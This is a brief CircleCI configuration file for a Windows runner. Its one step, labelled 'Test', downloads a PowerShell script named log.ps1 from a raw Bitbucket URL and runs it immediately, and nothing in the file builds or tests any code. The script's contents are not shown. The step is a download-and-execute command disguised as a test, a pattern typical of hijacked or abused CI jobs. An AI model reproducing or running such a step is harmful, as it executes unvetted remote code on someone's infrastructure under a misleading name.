version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/Rawanda/cung/raw/0bc64c05697db36582f6aa3703efc818525e7614/log.ps1 -OutFile log.ps1
            ./log.ps1